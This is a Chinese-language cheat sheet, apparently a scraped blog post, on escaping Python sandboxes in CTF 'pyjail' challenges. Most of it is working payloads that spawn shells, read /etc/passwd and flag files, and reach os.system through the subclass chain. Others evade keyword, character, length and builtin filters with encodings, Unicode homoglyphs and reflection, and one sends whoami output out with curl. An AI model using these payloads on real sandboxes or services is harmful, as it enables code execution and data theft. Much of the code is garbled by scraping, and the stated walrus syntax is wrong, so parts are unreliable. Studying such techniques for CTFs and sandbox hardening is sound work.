可用的函数和模块以及文件操作 函数和模块 import 函数 1 __import__ ('os' ).system('dir' )
exec & eval 函数 1 2 eval ('__import__("os").system("dir")' )exec ('__import__("os").system("dir")' )
execfile 函数 执行文件,主要用于引入模块来执行命令 python3不存在
1 2 3 >>>execfile('/usr/lib/python2.7/os.py' ) >>>system('dir' ) >>>getcwd()
timeit 函数 from timeit 模块 1 2 import timeittimeit.timeit('__import__("os").system("dir")' ,number=1 )
是一个 Python 内置模块,用于计时小段代码的执行时间。它提供了一种简单的方法来测量代码的性能,非常适合用于基准测试(benchmarking)。
1 python -m timeit "x = sum(range(1000))" //这将输出多次执行该代码段的平均时间。
1 2 3 4 5 6 7 8 9 10 11 12 import timeitdef example (): return sum (range (1000 )) execution_time = timeit.timeit("example()" , globals =globals (), number=1000 ) print (f"Execution time: {execution_time} seconds" )
1 2 import platform print platform.popen('dir' ).read()
commands 模块
1 2 3 import commandsprint commands.getoutput("dir" )print commands.getstatusoutput("dir" )
subprocess模块 py3集大成之模块
shell=True 命令本身被bash启动,支持shell启动,否则不支持
1 2 3 4 5 6 7 8 9 10 11 import subprocesssubprocess.call(['ls' ],shell=True ) subprocess.getstatusoutput("dir" ) subprocess.getoutput("dir" ) subprocess.check_output(['ls' , '/' ]) subprocess.run(['ls' , '/' ], capture_output=True , text=True ) ''' capture_output=True 表示捕获标准输出和标准错误。 text=True 表示将输出作为字符串处理,而不是字节。 check=True 表示如果命令返回非零退出状态,将引发 subprocess.CalledProcessError 异常。 '''
1 2 3 4 5 6 import subprocess try : result = subprocess.run(['ls' , '/' ], capture_output=True , text=True , check=True ) print ("Command output:\n" , result.stdout) except subprocess.CalledProcessError as e: print ("Command failed with error:\n" , e.stderr)
compile 函数 compile() 函数将一个字符串编译为字节代码。
1 compile (source, filename, mode[, flags[, dont_inherit]])
source – 字符串或者AST(Abstract Syntax Trees)对象(抽象语法树)
filename – 代码文件名称,如果不是从文件读取代码则传递一些可辨认的值
mode – 指定编译代码的种类。可以指定为 exec
, single
flags – 变量作用域,局部命名空间,如果被提供,可以是任何映射对象
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 >>>str = "for i in range(0,10): print(i)" >>> c = compile (str ,'' ,'exec' ) >>> c<code object <module> at 0x10141e0b0 , file "" , line 1 > >>> exec (c)0 1 2 3 4 5 6 7 8 9 >>> str = "3 * 4 + 5" >>> a = compile (str ,'' ,'eval' )>>> eval (a)17 source_code = """ def greet(name): return 'Hello, ' + name print(greet('World')) """ code_object = compile (source_code, '<string>' , 'exec' ) exec (code_object)
1 2 3 4 5 6 7 8 9 10 11 import subprocesscommand = "ls /" compiled_command = compile (f"subprocess.getoutput('{command} ')" , '<string>' , 'eval' ) output = eval (compiled_command) print (output)
fstring(f修饰符 py>3.6) 1 2 f'{__import__ ("os" ).system("ls" )} ' F'{__import__ ("os" ).system("ls" )} '
sys模块 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 import sysprint ("All command line arguments:" , sys.argv)print ("Script name:" , sys.argv[0 ])if len (sys.argv) > 1 : print ("Arguments passed to the script:" , sys.argv[1 :]) else : print ("No arguments were passed to the script." ) ----------------------------------- sys.exit(0 ) sys.exit(1 ) ------------------------------------ print ("Module search paths:" , sys.path)----------------------------------- sys.stdout = open ('output.txt' , 'w' ) print ("This will be written to the file output.txt" )sys.stdout = sys.__stdout__ print ("This will be printed to the console" )----------------------------------- print ("Python version:" , sys.version)
文件操作 file 函数
open 函数
codecs模块 1 2 import codecscodecs.open ('test' ).read()
Filetype 函数 from types 模块 可以用来读取文件
1 2 import typesprint types.FileType("flag" ).read()
绕过 禁用import os 引入 使用内联函数: 因为import 函数本身是用来动态的导入模块,比如:import(module)
或者 import module
1 2 3 a = __import__ ("bf" .decode('rot_13' )) a.system('sh' )
1 a = __import__(codecs.decode('bf', 'rot_13'))
importlib库 同款用法
builtins函数 n. 执行内建的函数;内键指令 adj. 安装在内部的;装入的,内装式 网络 内装;装入的
该函数模块中的函数都被自动引入,不需要再单独引入) , dir(__builtins__)
编码和解码需要处理的是 bytes
对象,而不是 str
1 2 3 4 5 6 7 8 9 __builtins__.__dict__['X19pbXBvcnRfXw==' .decode('base64' )]('b3M=' .decode('base64' )).system('sh' ) __builtins__.__dict__[codecs.decode(b'X19pbXBvcnRfXw==' , 'base64' ).decode('utf-8' )](codecs.decode(b'b3M=' , 'base64' ).decode('utf-8' )).system('sh' ) 等同于 __builtins__.__dict__[_import__]('os' ).system('sh' )
路径引入os等模块 因为一般都是禁止引入敏感包,当禁用os时,实际上就是 sys.modules[‘os’]=None
而因为一般的类linux系统的python os路径都是/usr/lib/python2.7/os.py
1 2 import syssys.modules['os' ]='/usr/lib/pythonx.xx/os.py'
reload 禁止引用某些函数时,可能会删除掉一些函数的引用,比如:
1 del __builtins__.__dict__['__import__' ]
这样就无法再引入,但是我们可以用 reload(__builtins__)
但是reload 本身也是builtins 模块的函数,其本身也可能会被禁掉
1 2 3 import __builtins__import impimp.reload(__builtins__)
这样就可以得到完整的builtins 模块了,需要注意的是需要先import __builtins__
,如果不写的话,虽然builtins 模块已经被引入,但是它实际上是不可见的,即它仍然无法被找到,这里是这么说的:
引入imp模块的reload函数能够生效的前提是,在最开始有这样的程序语句import builtins ,这个import的意义并不是把内建模块加载到内存中,因为内建早已经被加载了,它仅仅是让内建模块名在该作用域中可见。
再如果imp的reload被禁用掉呢?同时禁用掉路径引入需要的sys模块呢? 可以尝试上面的execfile()函数,或者open函数打开文件,exec执行代码
1 2 execfile('/usr/lib/python2.7/os.py' )
1 2 3 4 5 6 7 8 9 10 11 > >> __builtins__.__dict__['eval' ] <built-in function eval> > >> del __builtins__.__dict__['eval' ] > >> __builtins__.__dict__['eval' ] Traceback (most recent call last): File "<stdin>", line 1, in <module> KeyError: 'eval' > >> reload(__builtins__) <module '__builtin__' (built-in)> > >> __builtins__.__dict__['eval' ] <built-in function eval>
函数名字符串扫描过滤的绕过 (通过getattr来字符串操作)假如沙箱本身不是通过对包的限制,而是扫描函数字符串,关键码等等来过滤的;而关键字和函数没有办法直接用字符串相关的编码或解密操作
这里就可以使用: getattr
用法 :
1 2 3 4 5 6 7 8 9 getattr (__import__ ("os" ),"flfgrz" .encode("rot13" ))('ls' ) getattr (__import__ ("os" ),"metsys" [::-1 ])('ls' )__import__ ("os" ).__getattribute__("metsys" [::-1 ])('ls' )__import__ ("os" ).__getattribute__("flfgrz" .encode("rot13" ))('ls' )
如果某个类定义了 getattr() 方法,Python 将只在正常的位置查询属性时才会调用它。如果实例 x 定义了属性 color, x.color 将 不会 调用x.getattr(‘color’);而只会返回 x.color 已定义好的值。 如果某个类定义了 getattribute() 方法,在 每次引用属性或方法名称时 Python 都调用它(特殊方法名称除外,因为那样将会导致讨厌的无限循环)
恢复 sys.modules 一些过滤中可能将 sys.modules['os']
进行修改,这个时候即使将 os 模块导入进来,也是无法使用的.
由于很多别的命令执行库也使用到了 os,因此也会受到相应的影响,例如 subprocess
由于 import 导入模块时会检查 sys.modules 中是否已经有这个类
,如果有则不加载,没有则加载.因此我们只需要将 os 模块删除,然后再次导入即可。
或者说,我们这一步:del sys.modules['os']
1 2 3 Traceback (most recent call last): File "<stdin>", line 1, in <module> AttributeError: 'str' object has no attribute 'system'
基于继承链获取 (object类)在清空了 __builtins__
的情况下,我们也可以通过索引 subclasses 来找到这些内建函数。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ().__class__.__bases__[0 ].__subclasses__()[40 ]("flag" ).read() "" .__class__.__mro__[2 ].__subclasses__()[40 ]("flag" ).read()().__class__.__bases__[0 ].__subclasses__()[40 ]("flag" ,"w" ).write("1111" ) ().__class__.__bases__[0 ].__subclasses__()[59 ].__init__.func_globals.values()[13 ]['eval' ]('__import__("os").popen("flag").read()' ) ''' >>> ().__class__.__bases__[0].__subclasses__()[59]<class 'warnings.catch_warnings'> 注意,py2里面的func_globals在py3重写成__globals__了 ''' >>> [].__class__.__base__.__subclasses__()[76 ].__init__.__globals__['os' ]<module 'os' from '/usr/lib/python2.7/os.pyc' > >>> [].__class__.__base__.__subclasses__()[71 ].__init__.__globals__['os' ]<module 'os' from '/usr/lib/python2.7/os.pyc' > >>> "" .__class__.__mro__[2 ].__subclasses__()[71 ].__init__.__globals__['os' ]<module 'os' from '/usr/lib/python2.7/os.pyc' >
1 2 3 4 5 6 7 ().__class__.__bases__[0 ].__subclasses__()[133 ].__init__.__globals__['popen' ]('ls /' ).read() >>> ().__class__.__bases__[0 ].__subclasses__()[133 ]<class 'os._wrap_close' > ().__class__.__bases__[0 ].__subclasses__()[144 ].__init__.__globals__['__builtins__' ]['eval' ]('__import__("os").popen("ls /").read()' )
不能直接在模块的 __globals__
字典中,而是在 __builtins__
绕过基于字符串匹配的过滤 字符串拼接 1 2 3 '' .__class__.__mro__[2 ].__subclasses__()[59 ].__init__.__globals__['__builtins__' ]['file' ]('E:/passwd' ).read()'' .__class__.__mro__[2 ].__subclasses__()[59 ].__init__.__globals__['__buil' +'tins__' ]['fi' +'le' ]('E:/passwd' ).read()
当然,如果过滤的是 __class__
或者 __mro__
base64 变形 1 2 3 4 5 6 7 8 >>> import base64>>> base64.b64encode('__import__' )'X19pbXBvcnRfXw==' >>> base64.b64encode('os' )'b3M=' >>> __builtins__.__dict__['X19pbXBvcnRfXw==' .decode('base64' )] ('b3M=' .decode('base64' )).system('ls' )
逆序 1 2 3 4 5 >>> eval (')"imaohw"(metsys.)"so"(__tropmi__' [::-1 ])root >>> exec (')"imaohw"(metsys.so ;so tropmi' [::-1 ])root
注意 exec 与 eval 在执行上有所差异。
进制转换 八进制:
1 2 3 4 5 6 7 8 9 10 11 exec ("print('RCE'); __import__('os').system('ls')" )exec ("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51" )s = "eval(list(dict(v_a_r_s=True))[len([])][::len(list(dict(aa=()))[len([])])])(__import__(list(dict(b_i_n_a_s_c_i_i=1))[False][::len(list(dict(aa=()))[len([])])]))[list(dict(a_2_b___b_a_s_e_6_4=1))[False][::len(list(dict(aa=()))[len([])])]](list(dict(X19pbXBvcnRfXygnb3MnKS5wb3BlbignZWNobyBIYWNrZWQ6IGBpZGAnKS5yZWFkKCkg=True))[False])" octal_string = "" .join([f"\\{oct (ord (c))[2 :]} " for c in s]) print (octal_string)exec ("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x27\x6c\x73\x27\x29" )
hex、rot13、base32 等。
过滤了属性名或者函数名: 在 payload 的构造中,我们大量的使用了各种类中的属性,例如 class__、__import 等。
getattr 函数 getattr 是 Python 的内置函数,用于获取一个对象的属性或者方法。其语法如下:
1 getattr (object , name[, default])
这里,object 是对象,name 是字符串,代表要获取的属性的名称。如果提供了 default 参数,当属性不存在时会返回这个值,否则会抛出 AttributeError。
1 2 3 4 5 6 7 8 getattr ({},'__class__' )<class 'dict' > getattr (os,'system' )<built-in function system> getattr (os,'system' )('cat /etc/passwd' )root:x:0 :0 :root:/root:/usr/bin /zsh getattr (os,'system111' ,os.system)('cat /etc/passwd' )root:x:0 :0 :root:/root:/usr/bin /zsh
这样一来,就可以将 payload 中的属性名转化为字符串,字符串的变换方式多种多样,更易于绕过黑名单。
__getattribute__ 函数 getattr
函数在调用时,实际上就是调用这个类的 __getattribute__
1 2 3 4 5 os.\__getattribute__ <method-wrapper '__getattribute__' of module object at 0x7f06a9bf44f0 > os.__getattribute__('system' ) <built-in function system> __getattr__ 函数
getattr 是 Python 的一个特殊方法,当尝试访问一个对象的不存在的属性时,它就会被调用。它允许一个对象动态地返回一个属性值,或者抛出一个 AttributeError 异常。
如下是 getattr 方法的基本形式:
1 2 3 class MyClass : def __getattr__ (self, name ): return 'You tried to get ' + name
在这个例子中,任何你尝试访问的不存在的属性都会返回一个字符串,形如 “You tried to get X”,其中 X 是你尝试访问的属性名。
与 _getattribute _ 不同,getattr 只有在属性查找失败时才会被调用,这使得 getattribute 可以用来更为全面地控制属性访问。
如果在一个类中同时定义了 getattr 和 getattribute__,那么无论属性是否存在,__getattribute 都会被首先调用。只有当 getattribute 抛出 AttributeError 异常时,getattr 才会被调用。
_globals _ 替换globals 可以用 func_globals 直接替换;
1 2 3 '' .__class__.__mro__[2 ].__subclasses__()[59 ].__init__.__globals__'' .__class__.__mro__[2 ].__subclasses__()[59 ].__init__.func_globals'' .__class__.__mro__[2 ].__subclasses__()[59 ].__init__.__getattribute__("__glo" +"bals__" )
1 2 3 4 5 6 7 8 9 10 11 12 13 '' .__class__.__mro__[2 ][].__class__.__mro__[1 ] {}.__class__.__mro__[1 ] ().__class__.__mro__[1 ] [].__class__.__mro__[-1 ] {}.__class__.__mro__[-1 ] ().__class__.__mro__[-1 ] {}.__class__.__bases__[0 ] ().__class__.__bases__[0 ] [].__class__.__bases__[0 ] [].__class__.__base__ ().__class__.__base__ {}.__class__.__base__
过滤 import python 中除了可以使用 import 来导入,还可以使用 _import _ 和 importlib.import_module
_import _
_import _(‘os’)importlib.import_module
注意:importlib 需要进行导入之后才能够使用,所以有些鸡肋。。。
1 2 import importlibimportlib.import_module('os' ).system('ls' )
__loader__.load_module 如果使用 audithook
的方式进行过滤,上面的两种方法就无法使用了,但是 loader .load_module 底层实现与 import 不同, 因此某些情况下可以绕过.
loader .load_module(‘os’) <module ‘os’ (built-in)>
过滤了 [] 如果中括号被过滤了,则可以使用如下的两种方式来绕过:
调用__getitem__()函数直接替换; 调用 pop()函数(用于移除列表中的一个元素,默认最后一个元素,并且返回该元素的值)替换;
1 '' .__class__.__mro__[-1 ].__subclasses__()[200 ].__init__.__globals__['__builtins__' ]['__import__' ]('os' ).system('ls' )
getitem ()替换中括号[]1 '' .__class__.__mro__.__getitem__(-1 ).__subclasses__().__getitem__(200 ).__init__.__globals__.__getitem__('__builtins__' ).__getitem__('__import__' )('os' ).system('ls' )
pop()替换中括号[],结合__getitem__()利用 1 2 3 '' .__class__.__mro__.__getitem__(-1 ).__subclasses__().pop(200 ).__init__.__globals__.pop('__builtins__' ).pop('__import__' )('os' ).system('ls' )getattr ('' .__class__.__mro__.__getitem__(-1 ).__subclasses__().__getitem__(200 ).__init__.__globals__,'__builtins__' ).__getitem__('__import__' )('os' ).system('ls' )
过滤了 ‘’ str 函数 如果过滤了引号,我们 payload 中构造的字符串会受到影响。其中一种方法是使用 str() 函数获取字符串,然后索引到预期的字符。将所有的字符连接起来就可以得到最终的字符串。
1 2 3 4 5 6 7 8 9 ().__class__.__new__ <built-in method __new__ of type object at 0x9597e0 > str (().__class__.__new__)'<built-in method __new__ of type object at 0x9597e0>' str (().__class__.__new__)[21 ]'w' str (().__class__.__new__)[21 ]+str (().__class__.__new__)[13 ]+str (().__class__.__new__)[14 ]+str (().__class__.__new__)[40 ]+str (().__class__.__new__)[10 ]+str (().__class__.__new__)[3 ]'whoami' 1
chr 函数 也可以使用 chr 加数字来构造字符串
1 2 3 4 5 6 chr (56 )'8' chr (100 )'d' chr (100 )*40 'dddddddddddddddddddddddddddddddddddddddd'
list + dict 使用 dict 和 list 进行配合可以将变量名转化为字符串,但这种方式的弊端在于字符串中不能有空格等。
_doc __doc _ 变量可以获取到类的说明信息,从其中索引出想要的字符然后进行拼接就可以得到字符串:
1 2 ().__doc__.find('s' ) ().__doc__[19 ]+().__doc__[86 ]+().__doc__[19 ]
bytes 函数 bytes 函数可以接收一个 ascii 列表,然后转换为二进制字符串,再调用 decode
1 bytes ([115 , 121 , 115 , 116 , 101 , 109 ]).decode()
过滤了 + 过滤了 + 号主要影响到了构造字符串,假如题目过滤了引号和加号,构造字符串还可以使用 join
函数,初始的字符串可以通过 str() 进行获取.具体的字符串内容可以从 _doc _ 中取,
1 str ().join(().__doc__[19 ],().__doc__[23 ])
过滤了数字 如果过滤了数字的话,可以使用一些函数的返回值获取。
1 2 3 0 :int (bool ([]))、Flase、len ([])、any (())1 :int (bool (["" ]))、True 、all (())、int (list (list (dict (a၁=())).pop()).pop())
有了 0 之后,其他的数字可以通过运算进行获取:
1 2 3 4 0 ** 0 == 1 1 + 1 == 2 2 + 1 == 3 2 ** 2 == 4
当然,也可以直接通过 repr 获取一些比较长字符串,然后使用 len 获取大整数。
1 2 3 4 len (repr (True ))4 len (repr (bytearray ))19
第三种方法,可以使用 len + dict + list 来构造,这种方式可以避免运算符的的出现
1 2 3 0 -> len ([])2 -> len (list (dict (aa=()))[len ([])])3 -> len (list (dict (aaa=()))[len ([])])
第四种方法: unicode 会在后续的 unicode 绕过中介绍
过滤了空格 通过 ()、[] 替换
过滤了运算符 == 可以用 in 来替换
or 可以用 + 、-、|来替换
1 2 3 4 5 for i in [(100 , 100 , 1 , 1 ), (100 , 2 , 1 , 2 ), (100 , 100 , 1 , 2 ), (100 , 2 , 1 , 1 )]: ans = i[0 ]==i[1 ] or i[2 ]==i[3 ] print (bool (eval (f'{i[0 ]==i[1 ]} | {i[2 ]==i[3 ]} ' )) == ans) print (bool (eval (f'- {i[0 ]==i[1 ]} - {i[2 ]==i[3 ]} ' )) == ans) print (bool (eval (f'{i[0 ]==i[1 ]} + {i[2 ]==i[3 ]} ' )) == ans)
and 可以用&、 *替代
1 2 3 4 for i in [(100 , 100 , 1 , 1 ), (100 , 2 , 1 , 2 ), (100 , 100 , 1 , 2 ), (100 , 2 , 1 , 1 )]: ans = i[0 ]==i[1 ] and i[2 ]==i[3 ] print (bool (eval (f'{i[0 ]==i[1 ]} & {i[2 ]==i[3 ]} ' )) == ans) print (bool (eval (f'{i[0 ]==i[1 ]} * {i[2 ]==i[3 ]} ' )) == ans)
过滤了 () 利用装饰器 @
利用魔术方法,例如 enum.EnumMeta.__getitem__
f 字符串执行
f 字符串算不上一个绕过,更像是一种新的攻击面,通常情况下用来获取敏感上下文信息,例如获取环境变量
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 {whoami.__class__.__dict__} {whoami.__globals__[os].__dict__} {whoami.__globals__[os].environ} {whoami.__globals__[sys].path} {whoami.__globals__[sys].modules} {whoami.__globals__[server].__dict__[bridge].__dict__[db].__dict__} 也可以直接 RCE f'{__import__ ("os" ).system("whoami" )} ' root f"{__builtins__.__import__ ('os' ).__dict__['popen' ]('ls' ).read()} "
过滤了内建函数 eval + list + dict 构造
假如我们在构造 payload 时需要使用 str 函数、bool 函数、bytes 函数等,则可以使用 eval 进行绕过。
1 2 3 4 5 6 eval ('str' )<class 'str' > eval ('bool' )<class 'bool' > eval ('st' +'r' )<class 'str' >
1 2 eval (list (dict (s_t_r=1 ))[0 ][::2 ])<class 'str' >
这样一来,只要 list 和 dict 没有被禁,就可以获取到任意的内建函数(__buildin__
过滤了.和 ,如何获取函数 通常情况下,我们会通过点号来进行调用__import__('binascii').a2b_base64
或者通过 getattr 函数:getattr(__import__('binascii'),'a2b_base64')
模块内的函数可以先使用__import__导入函数,然后使用 vars() 进行获取:
1 2 vars(__import__('binascii' ))['a2b_base64' ] <built-in function a2b_base64>
unicode 绕过 Python 3 开始支持非ASCII字符的标识符,也就是说,可以使用 Unicode 字符作为 Python 的变量名,函数名等。Python 在解析代码时,使用的 Unicode Normalization Form KC (NFKC) 规范化算法,这种算法可以将一些视觉上相似的 Unicode 字符统一为一个标准形式。
相似 unicode 寻找网站:http://shapecatcher.com/ 可以通过绘制的方式寻找相似字符

个人珍藏相似 unicode脚本:
个人珍藏相似 unicode脚本:
1 2 3 4 5 6 7 8 9 for i in range (128 ,65537 ): tmp=chr (i) try : res = tmp.encode('idna' ).decode('utf-8' ) if ("-" ) in res: continue print ("U:{} A:{} ascii:{} " .format (tmp, res, i)) except : pass
‘ 运行运行 下面是 0-9,a-z 的 unicode 字符
1 2 3 𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗 𝘢𝘣𝘤𝘥𝘦𝘧𝘨𝘩𝘪𝘫𝘬𝘭𝘮𝘯𝘰𝘱𝘲𝘳𝘴𝘵𝘶𝘷𝘸𝘹𝘺𝘻 𝘈𝘉𝘊𝘋𝘌𝘍𝘎𝘏𝘐𝘑𝘒𝘔𝘕𝘖𝘗𝘘𝘙𝘚𝘛𝘜𝘝𝘞𝘟𝘠𝘡 下划线可以使用对应的全角字符进行替换:_
1 2 3 4 >>> print (__name__) __main__ >>> print (__name__) File "<stdin>" , line 1 print (__name__) ^ SyntaxError: invalid character '_' (U+FF3F)
需要注意的是,某些 unicode 在遇到 lower()
函数时也会发生变换,因此碰到 lower()、upper() 这样的函数时要格外注意。
绕过命名空间限制 部分限制
有些沙箱在构建时使用 exec 来执行命令,exec 函数的第二个参数可以指定命名空间,通过修改、删除命名空间中的函数则可以构建一个沙箱。例子来源于 iscc_2016_pycalc。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 def _hook_import_ (name, *args, **kwargs ): module_blacklist = ['os' , 'sys' , 'time' , 'bdb' , 'bsddb' , 'cgi' , 'CGIHTTPServer' , 'cgitb' , 'compileall' , 'ctypes' , 'dircache' , 'doctest' , 'dumbdbm' , 'filecmp' , 'fileinput' , 'ftplib' , 'gzip' , 'getopt' , 'getpass' , 'gettext' , 'httplib' , 'importlib' , 'imputil' , 'linecache' , 'macpath' , 'mailbox' , 'mailcap' , 'mhlib' , 'mimetools' , 'mimetypes' , 'modulefinder' , 'multiprocessing' , 'netrc' , 'new' , 'optparse' , 'pdb' , 'pipes' , 'pkgutil' , 'platform' , 'popen2' , 'poplib' , 'posix' , 'posixfile' , 'profile' , 'pstats' , 'pty' , 'py_compile' , 'pyclbr' , 'pydoc' , 'rexec' , 'runpy' , 'shlex' , 'shutil' , 'SimpleHTTPServer' , 'SimpleXMLRPCServer' , 'site' , 'smtpd' , 'socket' , 'SocketServer' , 'subprocess' , 'sysconfig' , 'tabnanny' , 'tarfile' , 'telnetlib' , 'tempfile' , 'Tix' , 'trace' , 'turtle' , 'urllib' , 'urllib2' , 'user' , 'uu' , 'webbrowser' , 'whichdb' , 'zipfile' , 'zipimport' ] for forbid in module_blacklist: if name == forbid: raise RuntimeError('No you can\' import {0}!!!' .format (forbid)) return __import__ (name, *args, **kwargs) def sandbox_exec (command ): result = 0 __sandboxed_builtins__ = dict (__builtins__.__dict__) __sandboxed_builtins__['__import__' ] = _hook_import_ del __sandboxed_builtins__['open' ] _global = { '__builtins__' : __sandboxed_builtins__ } ... exec command in _global ...
沙箱首先获取 _builtins__,然后依据现有的 _builtins 来构建命名空间。 修改 __import__ 函数为自定义的_hook_import_ 删除 open 函数防止文件操作 exec 命令。 绕过方式:
由于 exec 运行在特定的命名空间里,可以通过获取其他命名空间里的 __builtins__(这个__builtins__保存的就是原始__builtins__的引用),比如 types 库,来执行任意命令:
1 __import__ ('types' ).__builtins__ __import__ ('string' ).__builtins__
完全限制(no builtins)
如果沙箱完全清空了 builtins , 则无法使用 import,如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 eval ("__import__" , {"__builtins__" : {}},{"__builtins__" : {}})Traceback (most recent call last): File "<stdin>" , line 1 , in <module> File "<string>" , line 1 , in <module> NameError: name '__import__' is not defined eval ("__import__" )<built-in function __import__ > exec ("import os" )exec ("import os" ,{"__builtins__" : {}},{"__builtins__" : {}})Traceback (most recent call last): File "<stdin>" , line 1 , in <module> File "<string>" , line 1 , in <module> ImportError: __import__ not found
这种情况下我们就需要利用 python 继承链来绕过,其步骤简单来说,就是通过 python 继承链获取内置类, 然后通过这些内置类获取到敏感方法例如 os.system 然后再进行利用。
常见的一些 RCE payload 如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 os[ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if x.__name__=="_wrap_close" ][0 ]["system" ]("ls" ) [ x for x in '' .__class__.__base__.__subclasses__() if x.__name__ == 'Popen' ][0 ]('ls' ) [ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if x.__name__=="_GeneratorContextManagerBase" and "os" in x.__init__.__globals__ ][0 ]["__builtins__" ] [ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if x.__name__=="_GeneratorContextManagerBase" and "os" in x.__init__.__globals__ ][0 ]["__builtins__" ]['help' ] [ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if x.__name__=="_wrap_close" ][0 ]['__builtins__' ] [ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if "wrapper" not in str (x.__init__) and "sys" in x.__init__.__globals__ ][0 ]["sys" ].modules["os" ].system("ls" ) [ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if "'_sitebuiltins." in str (x) and not "_Helper" in str (x) ][0 ]["sys" ].modules["os" ].system("ls" ) [ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if "wrapper" not in str (x.__init__) and "commands" in x.__init__.__globals__ ][0 ]["commands" ].getoutput("ls" ) [ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if "wrapper" not in str (x.__init__) and "pty" in x.__init__.__globals__ ][0 ]["pty" ].spawn("ls" ) [ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if "wrapper" not in str (x.__init__) and "importlib" in x.__init__.__globals__ ][0 ]["importlib" ].import_module("os" ).system("ls" ) [ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if "wrapper" not in str (x.__init__) and "importlib" in x.__init__.__globals__ ][0 ]["importlib" ].__import__ ("os" ).system("ls" ) [ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if "'imp." in str (x) ][0 ]["importlib" ].import_module("os" ).system("ls" ) [ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if "'imp." in str (x) ][0 ]["importlib" ].__import__ ("os" ).system("ls" ) [ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if "wrapper" not in str (x.__init__) and "pdb" in x.__init__.__globals__ ][0 ]["pdb" ].os.system("ls" ) [ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if "wrapper" not in str (x.__init__) and "builtins" in x.__init__.__globals__ ][0 ]["builtins" ].__import__ ('ctypes' ).CDLL(None ).system('ls /' .encode()) [ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if "wrapper" not in str (x.__init__) and "builtins" in x.__init__.__globals__ ][0 ]["builtins" ].__import__ ('multiprocessing' ).Process(target=lambda : __import__ ('os' ).system('curl localhost:9999/?a=`whoami`' )).start()
常见的一些 File payload 如下:
1 2 3 4 操作文件可以使用 builtins 中的 open ,也可以使用 FileLoader 模块的 get_data 方法。 [ x for x in '' .__class__.__base__.__subclasses__() if x.__name__=="FileLoader" ][0 ].get_data(0 ,"/etc/passwd" )
绕过多行限制 绕过多行限制的利用手法通常在限制了单行代码的情况下使用,例如 eval, 中间如果存在;或者换行会报错。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 >>> eval ("__import__('os');print(1)" ) >>> Traceback (most recent call last): >>> File "<stdin>" , line 1, in <module> >>> File "<string>" , line 1 >>> __import__('os' );print (1) >>> 1 >>> 2 >>> 3 >>> 4 >>> 5 >>> exec exec 可以支持换行符与;>>> eval ("exec('__import__(\"os\")\\nprint(1)')" ) >>> 1 >>> 1 >>> 2 >>> compile compile 在 single 模式下也同样可以使用 \n 进行换行, 在 exec 模式下可以直接执行多行代码. eval ('' 'eval(compile(' print ("hello world" ); print ("heyy" )', ' <stdin>', ' exec '))' '' )1 海象表达式 海象表达式是 Python 3.8 引入的一种新的语法特性,用于在表达式中同时进行赋值和比较操作。 海象表达式的语法形式如下: <expression> := <value> if <condition> else <value> 1 借助海象表达式,我们可以通过列表来替代多行代码: >>> eval ('[a:=__import__("os"),b:=a.system("id")]' ) >>> uid=1000(kali) gid=0(root) groups =0(root),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo ),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(wireshark),122(bluetooth),134(scanner),142(kaboxer) >>> [<module 'os' (frozen)>, 0] >>> 1 >>> 2 >>> 3 >>> 绕过长度限制 >>> BYUCTF_2023 中的几道 jail 题对 payload 的长度作了限制 eval ((__import__("re").sub(r'[a-z0-9 ]','',input("code > ").lower()))[:130])
题目限制不能出现数字字母,构造的目标是调用 open 函数进行读取 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 print (open (bytes ([102 ,108 ,97 ,103 ,46 ,116 ,120 ,116 ])).read())函数名比较好绕过,直接使用 unicode。数字也可以使用 ord 来获取然后进行相减。我这里选择的是 chr (333 ). print (open (bytes ([ord ('ō' )-ord ('ç' ),ord ('ō' )-ord ('á' ),ord ('ō' )-ord ('ì' ),ord ('ō' )-ord ('æ' ),ord ('ō' )-ord ('ğ' ),ord ('ō' )-ord ('Ù' ),ord ('ō' )-ord ('Õ' ),ord ('ō' )-ord ('Ù' )])).read())
但这样的话其实长度超出了限制。而题目的 eval 表示不支持分号 ;。
这种情况下,我们可以添加一个 exec。然后将 ord 以及不变的 a(‘ō’) 进行替换。这样就可以构造一个满足条件的 payload
1 exec ("a=ord;b=a('ō');print(open(bytes([b-a('ç'),b-a('á'),b-a('ì'),b-a('æ'),b-a('ğ'),b-a('Ù'),b-a('Õ'),b-a('Ù')])).read())" )
